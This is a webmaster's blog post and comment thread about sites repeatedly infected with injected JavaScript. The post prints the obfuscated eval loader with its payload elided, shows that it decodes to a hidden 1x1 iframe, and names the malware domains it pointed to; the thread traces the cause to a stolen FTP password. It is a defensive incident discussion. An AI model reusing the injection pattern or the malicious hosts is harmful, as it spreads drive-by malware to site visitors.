Hacked AgainSince the problem in 2007 my web sites have been running pretty smoothly. I never did get to the bottom of what caused it but the suspicion was an out of date WordPress install which had some sort of vulnerability.
This month it happened again. I first spotted it on 6 Jun when I saw a big iFrame appear below the page footer of this blog. Again there was a suspicion of a down-level WordPress but it was only one dot point off current. Never-the-less, I updated and the problem went away by wiping out the infected files. In fact, I did it so fast that I didn’t have time to investigate fully.
A week later, the problem was back and now, because I was fully up to date, I had to look more closely.
The code inserted was
[script]var t="";var arr="...";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);[/script]
which decodes to execute
document.write('[iframe src="http://esformofset.com/forum/php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"][/iframe]')
The hacked code was tacked on the end of module wp-blog-header.php so it is clear that the infection understands WordPress. Later I was informed by a regular visitor, that some other (static) pages on the site were also infected. One drawback of running a browser with full protection like Firefox with NoScript is that you can’t easily spot things like this when they occur. Anyway, I spent an hour yesterday evening clearing up the rest of the site. It had infected almost all files called index.htm and home.htm and one or two others with a high page rank due to a lot of external referrers. The inserted code was after <body> and was either identical or very similar to the above (just a change of target web page).
So it is clear that the infection mechanism is clever, I just wish I know what it was. I am no longer convinced that it is anything to do with WordPress – a ZeroDay vulnerability like this would have been reported by now and, at the time of writing I can find no other internet reference to this particular infection. There is no other active content on the site so that leaves the possibility of either a cracked password (all of which are strong and recently changed) or a compromised host server.
Webmaster
Wow, Thanks for posting this. I thought I was going to loose my mind trying to figure this out.
My situation is a little different. My websites have been hacked in the same way. But I am sure it is a hosting problem. I host two websites on JustHost and noticed about 3 days ago that I could not reach my websites. Upon further poking, I realized that I could access every page except index.php or index.html. I contacted the support and they just told me that the index files had incorrect permissions(which i had not changed btw). The permissions had been changed to 777 which is something I would never do. After correcting the permissions, I tried testing my websites. They load momentarily, and then windows media player opens trying to play a file called “hcp_asx”.
After reading your article, I downloaded all index files from my sites. I found different code for each website but all similar to the code you posted above. I removed the code from each index file and that fixed it. I have kept the code to examine it further. But how did it get there?
In fact The same thing is happening to my client who is also on Just Host, except he is on a different server. So I know that it has to be a site-wide hack on the Just Host systems or beyond. I am sending a copy to the JustHost support hopefully they can track it down. It may also be that they are unaware of it and many of their customers are starting to notice the same thing. Either way, I hope I don’t have to repeat clearing that code. Its a total security breach if their servers have been compromised and I would have to consider new hosting.
Thanks for posting the info. Let me know if you want a copy of the code.
I forgot to mention that before cleaning the code when I tested my website and windows media player popped up, Internet explorer was in the background communicating with esformofset.com. Windows Media player only pops up when using internet explorer. Safari and Firefox just crash all together.
Thanks for your response, Donnie. My host is DotEasy so if it is a host attack then it may be wide spread, though I am surprised that there is not more noise about it. Now you mention it, I must check the permissions on the files but I don’t recall that being a problem. We really have two questions to answer – how did they get in and how are they still getting in which may not have the same answer. For instance, did they leave a backdoor which we haven’t yet found. I have pretty thoroughly searched the file structure and also the database and not found anything but it is a massive undertaking even for a site as small as this and I can’t guarantee that there isn’t one there. I have two other sites with the same company, one on a different server, and they have not bee infected (yet).
Note that not all my infected files were index.* – one was home.htm and another was a random name which happened to have a high PageRank due to external referrers. You do need to check the dates on all files for recent changes, fortunately they don’t seem to be spoofing the file modified dates.
I got the same problem today!My Browser crashed and something was loading in the background. I found that script in wp-blog-header.php thx for that! But now i am not sure how to find the other snippets on my blog. I am from Germany. I didn’t found anything like this in the web only in the virus database. Strange thing, can it be a security hole in wordpress? I use BuddyPress Theme and Plugins…
It is my opinion that this is nothing to do with WordPress. I have found web references to identical infections on Joomla sites on or around March 6th and vBulletin sites in mid May.
Mark – the only infection I found in WordPress was wp-blog-header.php like you. The rest were
on static pages, mostly index.php, and identofied by the last modified date.
And today (at about 15:30GMT onwards) they got every single file on this site – static and WordPress. I am getting fed up with it.
They got me and some other people I know Tuesday June 14th at roughly the same time. Some observations:
* It’s not a specifically WordPress thing – one site has no CMS installed – but it does seem to like wp-blog-header.php when it’s there.
* It seems to prefer sites with higher Google ranking. A site I’ve got with the same host but using a different account was unaffected.
* I don’t think it’s a PC -> FTP -> website thing because it happened to one person who never touches her site.
Apparently the javascript resolves to javascript that writes a 1*1 iframe containing a link that you may not want to investigate: mjbuuyaqs.co.be/forum.php?tp=b90d8ed9804251f3
Which still doesn’t solve how it’s getting in.
(Sorry, didn’t realise the link parsed to produce an actual link. It’s a malware site)
[Editor: OK, I have removed the http to stop it doing it.]
Thanks treebots – I agree with your observations. In particular the Google Rank thing; on the second occasion when I was only hit in a few places, it went for the ones with highest rank: on the last occasion when it hit almost everything, it left out those that were excluded from search engines by robots.txt. I have made a call to my hosting company to see if they come up with any ideas.
A website I developed for a client experienced the same problem in the past couple of days. The website is hand coded ASP and hosted on EasySpace. In Firefox & IE you can’t see a problem, however Google Chrome makes users trying to access the webpage aware of a potential problem.
There are few postings about the attack on the web. Most conclude that you should set all files to chmod 644.
Looking at my logs for Sunday, the culprit seems to be a dynamic address owned by Orange in Spain which systematically downloaded every page, modified it and sent it back. It was using FTP apparently with my administrator account so I have changed the password *again* on that and everything else. The file protections are all ok. There wasn’t any activity prior to that which I could see.
Well I think we have cracked it – I remembered last week that I had leant the FTP password to a friend to do some testing so we checked his machine and he had a number of infections. Cleaned that up and, for good measure, changed the master passwords again and we have got through this Sunday with no problems. It looks like a simple stolen password which was just used for upload of a simply modified files. Though I shouldn’t say it, they could have done a lot better (or worse from our point of view).